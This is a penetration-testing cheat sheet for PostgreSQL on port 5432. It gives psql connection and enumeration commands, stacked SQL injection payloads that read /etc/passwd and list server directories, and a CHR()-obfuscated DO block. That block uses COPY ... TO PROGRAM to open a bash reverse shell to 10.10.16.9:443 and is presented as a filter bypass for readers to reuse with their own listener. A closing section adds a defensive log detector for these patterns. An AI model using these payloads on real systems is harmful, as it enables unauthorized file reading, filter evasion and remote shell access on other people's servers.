# PostgreSQL Port (5432)

PostgreSQL is a powerful, open-source object-relational database system. During security assessments, you may encounter PostgreSQL services listening on the standard port 5432 or on an alternative port such as 5433.

## How to Connect

### Basic Local Connection

```bash
psql -U <myuser>
```

Opens the psql console with the specified user.

### Remote Connection (Basic)

```bash
psql -h <host> -U <username> -d <database>
```

Connect to a remote PostgreSQL server specifying host, username, and database.

### Remote Connection (Full Parameters)

```bash
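psql -h <host> -p <port> -U <username> -W -d <database>
```

Complete remote connection with all parameters, including a custom port and a forced password prompt. `-W` takes no argument: psql prompts for the password interactively, so it is not passed on the command line.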

## Enumeration

### List All Databases

```sql
\l
```

This command displays all available databases on the PostgreSQL server.

### Switch to a Database

```sql
\c <database_name>
```

Change the current working database context.

### List Tables in Current Database

```sql
\dt
```

Shows all tables within the currently selected database.

### Extract Data from Specific Table

```sql
SELECT * FROM <table_name>;
```

Retrieve all records from a specified table.

## File System Operations

### Read File

```sql
''; SELECT pg_read_file('/etc/passwd',0,1000);
```

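Reads the contents of a file from the server's filesystem. This example reads the first 1000 characters of `/etc/passwd`. The leading `'';` is the injection prefix used when the statement is stacked onto a vulnerable query. By default `pg_read_file` is restricted to superusers; other roles can call it only if they have been granted `EXECUTE` on the function.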

### List Directory

```sql
''; SELECT pg_ls_dir('/var/www/');
```

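Lists the contents of a directory on the server's filesystem. Like `pg_read_file`, `pg_ls_dir` is restricted to superusers by default unless `EXECUTE` has been granted to another role.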

## Advanced Exploitation

### Reverse Shell WAF Bypass through SQL Injection

```sql
'';DO $reverse$
DECLARE
    s text;
BEGIN
    s := CHR(67)||CHR(79)||CHR(80)||CHR(89)||
         ' (SELECT '''') TO PROGRAM ' ||
         quote_literal('bash -c "bash -i >& /dev/tcp/10.10.16.9/443 0>&1"');
    EXECUTE s;
END $reverse$;
```

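This technique uses PostgreSQL's `COPY ... TO PROGRAM` to run an operating-system command as the database server's OS account and establish a reverse shell connection. `COPY ... PROGRAM` is available only to superusers and members of the `pg_execute_server_program` role, so it works only when the injected query runs with those privileges. The payload: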

* Uses `CHR()` functions to obfuscate the "COPY" command
* Executes a bash reverse shell connecting to IP `10.10.16.9` on port `443`
* Bypasses basic WAF filters through string concatenation

**Note:** Remember to replace the IP address and port with your actual listener configuration.

## Security Considerations
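
The `CHR()` concatenation shown above hides the `COPY` keyword from filters that match literal text, so a detector has to fold the concatenation before matching. The following Python is an added example, not part of the original notes: it normalizes `CHR(n)` and `||` in logged statements and flags `COPY ... PROGRAM`, `pg_read_file` and `pg_ls_dir`. The function names, rule names and sample statements are constructed for illustration.

```python
import re

# CHR(n) calls and the || joins between adjacent string literals
_CHR = re.compile(r"\bchr\s*\(\s*(\d{1,7})\s*\)", re.IGNORECASE)
_JOIN = re.compile(r"'\s*\|\|\s*'")

# Server-side primitives used on this page (PostgreSQL's own names)
RULES = {
    "copy_program": re.compile(r"\bcopy\b.{0,400}?\b(?:to|from)\s+program\b", re.I | re.S),
    "pg_read_file": re.compile(r"\bpg_read_file\s*\(", re.I),
    "pg_ls_dir": re.compile(r"\bpg_ls_dir\s*\(", re.I),
}

def _chr_literal(match):
    """Turn CHR(n) into a quoted one-character literal."""
    code = int(match.group(1))
    # Leave out-of-range code points and the quote character (39) untouched
    if code > 0x10FFFF or code == 39:
        return match.group(0)
    return "'" + chr(code) + "'"

def normalize(statement):
    """Fold CHR(n) and '||' concatenation into the text they build."""
    folded = _CHR.sub(_chr_literal, statement)
    return _JOIN.sub("", folded)  # 'C'||'O'||'P'||'Y' becomes 'COPY'

def findings(statement):
    """Return the sorted rule names that match the normalized statement."""
    text = normalize(statement)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

# Constructed statements, as they would appear with log_statement = 'all'
SAMPLES = [
    "SELECT id, name FROM customers WHERE id = 7;",
    "SELECT pg_read_file('/etc/passwd',0,1000);",
    "DO $x$ DECLARE s text; BEGIN s := CHR(67)||CHR(79)||CHR(80)||CHR(89)||"
    " ' (SELECT '''') TO PROGRAM ' || quote_literal('id'); EXECUTE s; END $x$;",
]

if __name__ == "__main__":
    for stmt in SAMPLES:
        print(findings(stmt) or "-", "|", stmt[:60])
```

This is a triage filter for statement logs: it folds only the `CHR()`/`||` form used on this page and will not decode other encodings.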

